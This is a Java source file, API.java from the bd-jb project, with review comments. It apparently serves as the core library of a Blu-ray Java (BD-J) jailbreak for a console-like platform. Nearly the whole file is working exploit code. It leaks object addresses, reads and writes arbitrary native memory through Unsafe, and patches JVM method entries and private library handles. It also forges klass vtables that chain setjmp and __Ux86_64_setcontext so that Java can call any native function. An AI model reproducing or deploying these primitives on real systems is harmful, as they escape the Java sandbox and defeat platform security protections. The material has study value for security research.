// bd-jb/com/bdjb/API.java
// (Listing metadata from the source page: 583 lines, 17 KiB, Java.)

/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
/**
 * Provides access to native memory and lets Java code call native functions.
 *
 * <p>Raw memory reads/writes and allocation are delegated to an {@code UnsafeInterface}: {@code
 * UnsafeSunImpl} is tried first, and {@code UnsafeJdkImpl} is used when constructing it throws
 * {@link ClassNotFoundException}. That fallback also selects the "JDK 11" code paths and offsets
 * used throughout this class. Symbols are resolved through the private {@code find}/{@code
 * findEntry} method of {@code java.lang.ClassLoader$NativeLibrary}. Native functions are invoked
 * through {@link #call(long, long, long, long, long, long, long)}.
 *
 * <p>Use {@link #getInstance()} to obtain the shared instance. Only {@code getInstance()} is
 * synchronized; no other method performs any locking.
 *
 * <p>NOTE(review): the code avoids Java 5+ language features (generics, autoboxing, varargs),
 * presumably to stay compatible with the BD-J toolchain. Keep it that way when editing.
 */
public final class API {
  /** Size in bytes of an 8-bit integer. */
  public static final int INT8_SIZE = 1;
  /** Size in bytes of a 16-bit integer. */
  public static final int INT16_SIZE = 2;
  /** Size in bytes of a 32-bit integer. */
  public static final int INT32_SIZE = 4;
  /** Size in bytes of a 64-bit integer. */
  public static final int INT64_SIZE = 8;

  /** The {@code RTLD_DEFAULT} pseudo-handle (-2) accepted by {@link #dlsym(long, String)}. */
  public static final int RTLD_DEFAULT = -2;

  // Module handles passed to dlsym(). NOTE(review): hard-coded, presumably fixed on the target.
  public static final int LIBC_MODULE_HANDLE = 0x2;
  public static final int LIBKERNEL_MODULE_HANDLE = 0x2001;
  public static final int LIBJAVA_MODULE_HANDLE = 0x4A;

  private static final String UNSUPPORTED_DLOPEN_OPERATION_STRING =
      "Unsupported dlopen() operation";

  private static final String JAVA_JAVA_LANG_REFLECT_ARRAY_MULTI_NEW_ARRAY_SYMBOL =
      "Java_java_lang_reflect_Array_multiNewArray";
  private static final String JVM_NATIVE_PATH_SYMBOL = "JVM_NativePath";
  private static final String SETJMP_SYMBOL = "setjmp";
  private static final String UX86_64_SETCONTEXT_SYMBOL = "__Ux86_64_setcontext";
  private static final String ERROR_SYMBOL = "__error";

  private static final String MULTI_NEW_ARRAY_METHOD_NAME = "multiNewArray";
  private static final String MULTI_NEW_ARRAY_METHOD_SIGNATURE = "(J[I)J";

  private static final String NATIVE_LIBRARY_CLASS_NAME = "java.lang.ClassLoader$NativeLibrary";
  private static final String FIND_METHOD_NAME = "find";
  private static final String FIND_ENTRY_METHOD_NAME = "findEntry";
  private static final String HANDLE_FIELD_NAME = "handle";
  private static final String VALUE_FIELD_NAME = "value";

  private static final int[] MULTI_NEW_ARRAY_DIMENSIONS = new int[] {1};

  private static API instance;

  // Memory backend and the offset of Long.value (used by addrof()).
  private UnsafeInterface unsafe;
  private long longValueOffset;

  // Reflective handles used by dlsym().
  private Object nativeLibrary;
  private Method findMethod;
  private Field handleField;

  // Address of the 32-bit handle patched by dlsym(); 0 unless initSymbols() needed the workaround.
  private long executableHandle;

  // Resolved native addresses.
  private long Java_java_lang_reflect_Array_multiNewArray;
  private long JVM_NativePath;
  private long setjmp;
  private long __Ux86_64_setcontext;
  private long __error;

  // True when the UnsafeJdkImpl fallback was taken; selects the JDK 11 layouts/offsets.
  private boolean jdk11;

  private API() throws Exception {
    this.init();
  }

  /**
   * Returns the shared instance, creating and initializing it on first use.
   *
   * @return the singleton instance
   * @throws Exception if initialization fails, including IllegalStateException when a required
   *     symbol or method cannot be found
   */
  public static synchronized API getInstance() throws Exception {
    if (instance == null) {
      instance = new API();
    }
    return instance;
  }

  /**
   * Native stub whose entry point is written directly by {@link #initApiCall()}, so that it points
   * at {@code Java_java_lang_reflect_Array_multiNewArray}. Used only by {@link #call(long, long,
   * long, long, long, long, long)}.
   */
  private native long multiNewArray(long componentType, int[] dimensions);

  /** Runs the initialization steps in dependency order. */
  private void init() throws Exception {
    initUnsafe(); // memory primitives, needed by every later step
    initDlsym(); // reflective symbol lookup
    initSymbols(); // uses dlsym() and strcmp()
    initApiCall(); // uses addrof(), read*/write* and the resolved symbols
  }

  /**
   * Selects the Unsafe backend and records the field offset of {@code Long.value}, which {@link
   * #addrof(Object)} relies on.
   */
  private void initUnsafe() throws Exception {
    try {
      unsafe = new UnsafeSunImpl();
      jdk11 = false;
    } catch (ClassNotFoundException e) {
      // UnsafeSunImpl is not usable on this runtime: fall back and use the JDK 11 layouts.
      unsafe = new UnsafeJdkImpl();
      jdk11 = true;
    }
    longValueOffset = unsafe.objectFieldOffset(Long.class.getDeclaredField(VALUE_FIELD_NAME));
  }

  /**
   * Prepares reflective access to {@code ClassLoader$NativeLibrary}, so that {@link #dlsym(long,
   * String)} can invoke its lookup method with an arbitrary handle.
   */
  private void initDlsym() throws Exception {
    Class nativeLibraryClass = Class.forName(NATIVE_LIBRARY_CLASS_NAME);

    // The lookup method is named findEntry on the JDK 11 path and find otherwise.
    if (jdk11) {
      findMethod =
          nativeLibraryClass.getDeclaredMethod(FIND_ENTRY_METHOD_NAME, new Class[] {String.class});
    } else {
      findMethod =
          nativeLibraryClass.getDeclaredMethod(FIND_METHOD_NAME, new Class[] {String.class});
    }
    handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
    findMethod.setAccessible(true);
    handleField.setAccessible(true);

    // A private NativeLibrary instance; dlsym() overwrites its handle field before each lookup.
    Constructor nativeLibraryConstructor =
        nativeLibraryClass.getDeclaredConstructor(
            new Class[] {Class.class, String.class, boolean.class});
    nativeLibraryConstructor.setAccessible(true);
    nativeLibrary =
        nativeLibraryConstructor.newInstance(new Object[] {getClass(), "api", Boolean.TRUE});
  }

  /**
   * Resolves every native symbol this class needs.
   *
   * @throws IllegalStateException if any symbol cannot be resolved
   */
  private void initSymbols() {
    JVM_NativePath = dlsym(RTLD_DEFAULT, JVM_NATIVE_PATH_SYMBOL);
    if (JVM_NativePath == 0) {
      throw new IllegalStateException("Could not find JVM_NativePath.");
    }

    __Ux86_64_setcontext = dlsym(LIBKERNEL_MODULE_HANDLE, UX86_64_SETCONTEXT_SYMBOL);
    if (__Ux86_64_setcontext == 0) {
      // Earlier versions have a bug where only the main executable's handle is used for lookups.
      // Find the 32-bit word holding that handle, so dlsym() can patch it: scan forward from
      // JVM_NativePath in 4-byte steps for the "Unsupported dlopen() operation" string. The
      // handle is taken to be the word immediately before that string.
      // NOTE(review): the scan is unbounded and does not terminate cleanly if the string is absent.
      executableHandle = JVM_NativePath & ~(4 - 1);
      while (strcmp(executableHandle, UNSUPPORTED_DLOPEN_OPERATION_STRING) != 0) {
        executableHandle += 4;
      }
      executableHandle -= 4;

      // Try again, now that dlsym() patches the executable's handle.
      __Ux86_64_setcontext = dlsym(LIBKERNEL_MODULE_HANDLE, UX86_64_SETCONTEXT_SYMBOL);
    }
    if (__Ux86_64_setcontext == 0) {
      throw new IllegalStateException("Could not find __Ux86_64_setcontext.");
    }

    // On the JDK 11 path the symbol is looked up in libjava; otherwise via RTLD_DEFAULT.
    if (jdk11) {
      Java_java_lang_reflect_Array_multiNewArray =
          dlsym(LIBJAVA_MODULE_HANDLE, JAVA_JAVA_LANG_REFLECT_ARRAY_MULTI_NEW_ARRAY_SYMBOL);
    } else {
      Java_java_lang_reflect_Array_multiNewArray =
          dlsym(RTLD_DEFAULT, JAVA_JAVA_LANG_REFLECT_ARRAY_MULTI_NEW_ARRAY_SYMBOL);
    }
    if (Java_java_lang_reflect_Array_multiNewArray == 0) {
      throw new IllegalStateException("Could not find Java_java_lang_reflect_Array_multiNewArray.");
    }

    setjmp = dlsym(LIBC_MODULE_HANDLE, SETJMP_SYMBOL);
    if (setjmp == 0) {
      throw new IllegalStateException("Could not find setjmp.");
    }

    __error = dlsym(LIBKERNEL_MODULE_HANDLE, ERROR_SYMBOL);
    if (__error == 0) {
      throw new IllegalStateException("Could not find __error.");
    }
  }

  /**
   * Points the native entry of {@link #multiNewArray} at {@code
   * Java_java_lang_reflect_Array_multiNewArray}.
   *
   * <p>Walks the method array reachable from this object's klass pointer. For each method it
   * decodes the name and signature symbols from the constant pool. On a match it writes the
   * function address into a fixed slot of the method, presumably the native-function entry.
   *
   * <p>All offsets are hard-coded per JVM layout (JDK 11 path vs. the other path). Do not change
   * them without re-deriving them for the target JVM build.
   *
   * @throws IllegalStateException if no method named multiNewArray with signature (J[I)J is found
   */
  private void initApiCall() {
    long apiInstance = addrof(this);
    long apiKlass = read64(apiInstance + 0x08);

    if (jdk11) {
      long methods = read64(apiKlass + 0x170);
      int numMethods = read32(methods + 0x00);

      for (int i = 0; i < numMethods; i++) {
        long method = read64(methods + 0x08 + i * 8);
        long constMethod = read64(method + 0x08);
        long constants = read64(constMethod + 0x08);

        short nameIndex = read16(constMethod + 0x2A);
        short signatureIndex = read16(constMethod + 0x2C);

        // Bit 0 of the constant-pool entry is cleared to obtain the Symbol address
        // (presumably a tag bit).
        long nameSymbol = read64(constants + 0x40 + nameIndex * 8) & ~(2 - 1);
        long signatureSymbol = read64(constants + 0x40 + signatureIndex * 8) & ~(2 - 1);
        short nameLength = read16(nameSymbol + 0x00);
        short signatureLength = read16(signatureSymbol + 0x00);

        String name = readString(nameSymbol + 0x06, nameLength);
        String signature = readString(signatureSymbol + 0x06, signatureLength);
        if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
            && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
          write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
          return;
        }
      }
    } else {
      long methods = read64(apiKlass + 0xC8);
      int numMethods = read32(methods + 0x10);

      for (int i = 0; i < numMethods; i++) {
        long method = read64(methods + 0x18 + i * 8);
        long constMethod = read64(method + 0x10);
        long constants = read64(method + 0x18);

        short nameIndex = read16(constMethod + 0x42);
        short signatureIndex = read16(constMethod + 0x44);

        // Bit 0 of the constant-pool entry is cleared to obtain the Symbol address
        // (presumably a tag bit).
        long nameSymbol = read64(constants + 0x40 + nameIndex * 8) & ~(2 - 1);
        long signatureSymbol = read64(constants + 0x40 + signatureIndex * 8) & ~(2 - 1);
        short nameLength = read16(nameSymbol + 0x08);
        short signatureLength = read16(signatureSymbol + 0x08);

        String name = readString(nameSymbol + 0x0A, nameLength);
        String signature = readString(signatureSymbol + 0x0A, signatureLength);
        if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
            && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
          write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
          return;
        }
      }
    }

    throw new IllegalStateException("Could not install native method.");
  }

  /**
   * Fills {@code contextBuf} with a register context for {@code __Ux86_64_setcontext}.
   *
   * <p>rbx, rsp, rbp and r12-r15 are copied from the setjmp buffer {@code jmpBuf} (offsets
   * 0x08-0x38). rip and the six argument registers are taken from the parameters. {@link
   * #call(long, long, long, long, long, long, long)} passes the same address for both buffers, so
   * every read from {@code jmpBuf} happens before the first write.
   *
   * <p>The context offsets are hard-coded for the target's context layout. The two zeroed
   * quadwords at 0x110/0x118 are presumably the FP-state format/ownership fields, cleared so no FP
   * state is restored — TODO confirm.
   */
  private void buildContext(
      long contextBuf,
      long jmpBuf,
      long rip,
      long rdi,
      long rsi,
      long rdx,
      long rcx,
      long r8,
      long r9) {
    long rbx = read64(jmpBuf + 0x08);
    long rsp = read64(jmpBuf + 0x10);
    long rbp = read64(jmpBuf + 0x18);
    long r12 = read64(jmpBuf + 0x20);
    long r13 = read64(jmpBuf + 0x28);
    long r14 = read64(jmpBuf + 0x30);
    long r15 = read64(jmpBuf + 0x38);

    write64(contextBuf + 0x48, rdi);
    write64(contextBuf + 0x50, rsi);
    write64(contextBuf + 0x58, rdx);
    write64(contextBuf + 0x60, rcx);
    write64(contextBuf + 0x68, r8);
    write64(contextBuf + 0x70, r9);
    write64(contextBuf + 0x80, rbx);
    write64(contextBuf + 0x88, rbp);
    write64(contextBuf + 0xA0, r12);
    write64(contextBuf + 0xA8, r13);
    write64(contextBuf + 0xB0, r14);
    write64(contextBuf + 0xB8, r15);
    write64(contextBuf + 0xE0, rip);
    write64(contextBuf + 0xF8, rsp);
    write64(contextBuf + 0x110, 0);
    write64(contextBuf + 0x118, 0);
  }

  /**
   * Calls {@code call(0)} 10000 times, so that {@code call} is optimized before real calls are made
   * (see the comment inside {@link #call(long, long, long, long, long, long, long)}).
   */
  public void train() {
    for (int i = 0; i < 10000; i++) {
      call(0);
    }
  }

  /**
   * Calls the native function at {@code func} with six integer arguments and returns its result.
   *
   * <p>The arguments are loaded into rdi, rsi, rdx, rcx, r8 and r9, in that order. The call works
   * by invoking the rebound {@link #multiNewArray} on a freshly allocated fake class object, in
   * two passes:
   *
   * <ol>
   *   <li>Its {@code multi_allocate} vtable slot points at {@code setjmp}. Afterwards, {@link
   *       #buildContext} turns the saved register state into a context that starts at {@code
   *       func}.
   *   <li>The slot points at {@code __Ux86_64_setcontext}, which loads that context.
   * </ol>
   *
   * <p>When {@code func} is 0, only the first pass runs; {@link #train()} relies on this.
   *
   * <p>The statement order and shape of this method matter, for the reason given in the comment
   * inside the body. Do not restructure it.
   *
   * @return 0 if multiNewArray returned 0, otherwise the 64-bit value stored at the address it
   *     returned (NOTE(review): presumably a JNI handle to the result — confirm)
   * @throws IllegalStateException if any scratch allocation fails
   */
  public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
    long fakeClassOop = malloc(INT64_SIZE);
    long fakeClass = malloc(0x100);
    long fakeKlass = malloc(0x200);
    long fakeKlassVtable = malloc(0x400);
    if (fakeClassOop == 0 || fakeClass == 0 || fakeKlass == 0 || fakeKlassVtable == 0) {
      throw new IllegalStateException("Could not allocate memory.");
    }

    write64(fakeClassOop, 0);
    memset(fakeClass, 0, 0x100);
    memset(fakeKlass, 0, 0x200);
    memset(fakeKlassVtable, 0, 0x400);

    try {
      long ret = 0;

      // When func is 0, only do one iteration to avoid calling __Ux86_64_setcontext.
      // This is used to "train" this function to kick in optimization early. Otherwise, it is
      // possible that optimization kicks in between the calls to setjmp and __Ux86_64_setcontext
      // leading to different stack layouts of the two calls.
      int iter = func == 0 ? 1 : 2;

      if (jdk11) {
        write64(fakeClassOop + 0x00, fakeClass);
        write64(fakeClass + 0x98, fakeKlass);
        write32(fakeKlass + 0xC4, 0); // dimension
        write64(fakeKlassVtable + 0xD8, JVM_NativePath); // array_klass

        for (int i = 0; i < iter; i++) {
          // The vtable pointer lives inside the buffer that setjmp/buildContext reuse, so it is
          // rewritten on every pass. NOTE(review): this store is repeated verbatim. It is left
          // untouched because this method's compiled shape matters (see above).
          write64(fakeKlass + 0x00, fakeKlassVtable);
          write64(fakeKlass + 0x00, fakeKlassVtable);
          if (i == 0) {
            write64(fakeKlassVtable + 0x158, setjmp); // multi_allocate
          } else {
            write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
          }

          ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);

          buildContext(
              fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
        }
      } else {
        write64(fakeClassOop + 0x00, fakeClass);
        write64(fakeClass + 0x68, fakeKlass);
        write32(fakeKlass + 0xBC, 0); // dimension
        write64(fakeKlassVtable + 0x80, JVM_NativePath); // array_klass
        write64(fakeKlassVtable + 0xF0, JVM_NativePath); // oop_is_array

        for (int i = 0; i < iter; i++) {
          // Rewritten on every pass; +0x20 is also the setjmp/context buffer.
          write64(fakeKlass + 0x10, fakeKlassVtable);
          write64(fakeKlass + 0x20, fakeKlassVtable);
          if (i == 0) {
            write64(fakeKlassVtable + 0x230, setjmp); // multi_allocate
          } else {
            write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
          }

          ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);

          buildContext(
              fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
        }
      }

      if (ret == 0) {
        return 0;
      }

      return read64(ret);
    } finally {
      free(fakeKlassVtable);
      free(fakeKlass);
      free(fakeClass);
      free(fakeClassOop);
    }
  }

  /** Same as the seven-argument {@code call} with {@code arg5 = 0}. */
  public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4) {
    return call(func, arg0, arg1, arg2, arg3, arg4, (long) 0);
  }

  /** Same as the seven-argument {@code call} with the remaining arguments set to 0. */
  public long call(long func, long arg0, long arg1, long arg2, long arg3) {
    return call(func, arg0, arg1, arg2, arg3, (long) 0);
  }

  /** Same as the seven-argument {@code call} with the remaining arguments set to 0. */
  public long call(long func, long arg0, long arg1, long arg2) {
    return call(func, arg0, arg1, arg2, (long) 0);
  }

  /** Same as the seven-argument {@code call} with the remaining arguments set to 0. */
  public long call(long func, long arg0, long arg1) {
    return call(func, arg0, arg1, (long) 0);
  }

  /** Same as the seven-argument {@code call} with the remaining arguments set to 0. */
  public long call(long func, long arg0) {
    return call(func, arg0, (long) 0);
  }

  /** Same as the seven-argument {@code call} with all arguments set to 0. */
  public long call(long func) {
    return call(func, (long) 0);
  }

  /** Returns errno, read as a 32-bit value through the pointer returned by {@code __error()}. */
  public int errno() {
    return read32(call(__error));
  }

  /**
   * Looks up {@code symbol} in the module identified by {@code handle}.
   *
   * <p>If initSymbols() located {@code executableHandle} (the workaround for earlier versions),
   * this method behaves differently. It temporarily writes {@code handle} into that 32-bit word,
   * looks up via {@link #RTLD_DEFAULT}, and restores the previous value afterwards.
   *
   * @param handle module handle, or {@link #RTLD_DEFAULT}
   * @param symbol symbol name
   * @return the symbol's address, or 0 if it was not found or the reflective call failed
   */
  public long dlsym(long handle, String symbol) {
    int oldHandle = RTLD_DEFAULT;
    try {
      if (executableHandle != 0) {
        // Earlier versions only use the main executable's handle: patch it for this lookup.
        oldHandle = read32(executableHandle);
        write32(executableHandle, (int) handle);
        handleField.setLong(nativeLibrary, RTLD_DEFAULT);
      } else {
        handleField.setLong(nativeLibrary, handle);
      }
      return ((Long) findMethod.invoke(nativeLibrary, new Object[] {symbol})).longValue();
    } catch (IllegalAccessException e) {
      return 0; // Treated like "symbol not found".
    } catch (InvocationTargetException e) {
      return 0; // Treated like "symbol not found".
    } finally {
      if (executableHandle != 0) {
        write32(executableHandle, oldHandle);
      }
    }
  }

  /**
   * Returns the raw address of {@code obj}. It stores the reference into the value field of a
   * scratch {@code Long}, then reads that field back as a long.
   *
   * <p>{@code new Long} is intentional: the box must be a fresh object, never a shared or cached
   * instance, because its value field is overwritten. NOTE(review): the result is a snapshot; a
   * moving GC could presumably relocate {@code obj} afterwards.
   */
  public long addrof(Object obj) {
    Long val = new Long(1337);
    unsafe.putObject(val, longValueOffset, obj);
    return unsafe.getLong(val, longValueOffset);
  }

  /** Reads a signed 8-bit value from native memory. */
  public byte read8(long addr) {
    return unsafe.getByte(addr);
  }

  /** Reads a signed 16-bit value from native memory. */
  public short read16(long addr) {
    return unsafe.getShort(addr);
  }

  /** Reads a 32-bit value from native memory. */
  public int read32(long addr) {
    return unsafe.getInt(addr);
  }

  /** Reads a 64-bit value from native memory. */
  public long read64(long addr) {
    return unsafe.getLong(addr);
  }

  /** Writes an 8-bit value to native memory. */
  public void write8(long addr, byte val) {
    unsafe.putByte(addr, val);
  }

  /** Writes a 16-bit value to native memory. */
  public void write16(long addr, short val) {
    unsafe.putShort(addr, val);
  }

  /** Writes a 32-bit value to native memory. */
  public void write32(long addr, int val) {
    unsafe.putInt(addr, val);
  }

  /** Writes a 64-bit value to native memory. */
  public void write64(long addr, long val) {
    unsafe.putLong(addr, val);
  }

  /** Allocates {@code size} bytes of native memory through the Unsafe backend. */
  public long malloc(long size) {
    return unsafe.allocateMemory(size);
  }

  /** Resizes a block obtained from {@link #malloc(long)}. */
  public long realloc(long ptr, long size) {
    return unsafe.reallocateMemory(ptr, size);
  }

  /** Frees a block obtained from {@link #malloc(long)} or {@link #realloc(long, long)}. */
  public void free(long ptr) {
    unsafe.freeMemory(ptr);
  }

  /** Copies {@code n} bytes from native {@code src} to native {@code dest}; returns {@code dest}. */
  public long memcpy(long dest, long src, long n) {
    unsafe.copyMemory(src, dest, n);
    return dest;
  }

  /** Copies the first {@code n} bytes of {@code src} to native {@code dest}; returns {@code dest}. */
  public long memcpy(long dest, byte[] src, long n) {
    for (int i = 0; i < n; i++) {
      write8(dest + i, src[i]);
    }
    return dest;
  }

  /** Copies {@code n} bytes from native {@code src} into {@code dest}; returns {@code dest}. */
  public byte[] memcpy(byte[] dest, long src, long n) {
    for (int i = 0; i < n; i++) {
      dest[i] = read8(src + i);
    }
    return dest;
  }

  /** Fills {@code n} native bytes at {@code s} with {@code (byte) c}; returns {@code s}. */
  public long memset(long s, int c, long n) {
    unsafe.setMemory(s, n, (byte) c);
    return s;
  }

  /** Fills the first {@code n} elements of {@code s} with {@code (byte) c}; returns {@code s}. */
  public byte[] memset(byte[] s, int c, long n) {
    for (int i = 0; i < n; i++) {
      s[i] = (byte) c;
    }
    return s;
  }

  /**
   * Compares {@code n} bytes like C {@code memcmp}, treating bytes as unsigned.
   *
   * @return 0 if equal, otherwise the difference of the first differing pair of unsigned bytes
   */
  public int memcmp(long s1, long s2, long n) {
    for (int i = 0; i < n; i++) {
      int b1 = read8(s1 + i) & 0xFF;
      int b2 = read8(s2 + i) & 0xFF;
      if (b1 != b2) {
        return b1 - b2;
      }
    }
    return 0;
  }

  /** Compares native {@code s1} with the array {@code s2}, with the same semantics as above. */
  public int memcmp(long s1, byte[] s2, long n) {
    for (int i = 0; i < n; i++) {
      int b1 = read8(s1 + i) & 0xFF;
      int b2 = s2[i] & 0xFF;
      if (b1 != b2) {
        return b1 - b2;
      }
    }
    return 0;
  }

  /** Compares the array {@code s1} with native {@code s2}, with the same semantics as above. */
  public int memcmp(byte[] s1, long s2, long n) {
    // Operands are swapped for the delegate, so negate to keep memcmp's sign convention.
    return -memcmp(s2, s1, n);
  }

  /**
   * Compares two NUL-terminated native strings like C {@code strcmp}, treating bytes as unsigned.
   *
   * @return 0 if equal, otherwise the difference of the first differing pair of unsigned bytes
   */
  public int strcmp(long s1, long s2) {
    for (int i = 0; ; i++) {
      int b1 = read8(s1 + i) & 0xFF;
      int b2 = read8(s2 + i) & 0xFF;
      if (b1 != b2) {
        return b1 - b2;
      }
      if (b1 == 0) {
        return 0; // Both strings ended together.
      }
    }
  }

  /**
   * Compares a native string with {@code s2}, which is encoded via {@link #toCBytes(String)}.
   * Uses the same semantics as {@link #strcmp(long, long)}.
   */
  public int strcmp(long s1, String s2) {
    byte[] bytes = toCBytes(s2);
    for (int i = 0; ; i++) {
      int b1 = read8(s1 + i) & 0xFF;
      int b2 = bytes[i] & 0xFF;
      if (b1 != b2) {
        return b1 - b2;
      }
      if (b1 == 0) {
        return 0; // Both strings ended together.
      }
    }
  }

  /** Compares {@code s1} with a native string; uses the same semantics as {@code strcmp}. */
  public int strcmp(String s1, long s2) {
    // Operands are swapped for the delegate, so negate to keep strcmp's sign convention.
    return -strcmp(s2, s1);
  }

  /** Copies a NUL-terminated native string, including the terminator; returns {@code dest}. */
  public long strcpy(long dest, long src) {
    for (int i = 0; ; i++) {
      byte ch = read8(src + i);
      write8(dest + i, ch);
      if (ch == (byte) 0) {
        break;
      }
    }
    return dest;
  }

  /**
   * Writes {@code src}, encoded via {@link #toCBytes(String)}, to {@code dest}. Copying stops
   * after the first NUL byte. Returns {@code dest}.
   */
  public long strcpy(long dest, String src) {
    byte[] bytes = toCBytes(src);
    for (int i = 0; ; i++) {
      byte ch = bytes[i];
      write8(dest + i, ch);
      if (ch == (byte) 0) {
        break;
      }
    }
    return dest;
  }

  /**
   * Reads native bytes starting at {@code src}, stopping at a NUL byte or after {@code n} bytes.
   * The bytes are decoded with the platform default charset.
   *
   * @param n maximum number of bytes to read; a negative value means no limit
   */
  public String readString(long src, long n) {
    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
    // Check the limit before reading, so no byte at or beyond src + n is touched.
    for (int i = 0; i != n; i++) {
      byte ch = read8(src + i);
      if (ch == (byte) 0) {
        break;
      }
      outputStream.write(ch);
    }
    return outputStream.toString();
  }

  /** Reads a NUL-terminated native string, decoded with the platform default charset. */
  public String readString(long src) {
    return readString(src, -1);
  }

  /**
   * Encodes {@code str} with the platform default charset and appends a NUL terminator.
   *
   * <p>The buffer is sized by the encoded byte length, not by {@code str.length()}, so strings
   * whose encoding takes more than one byte per char are neither truncated nor rejected.
   */
  public byte[] toCBytes(String str) {
    byte[] encoded = str.getBytes();
    byte[] bytes = new byte[encoded.length + 1];
    System.arraycopy(encoded, 0, bytes, 0, encoded.length);
    return bytes;
  }
}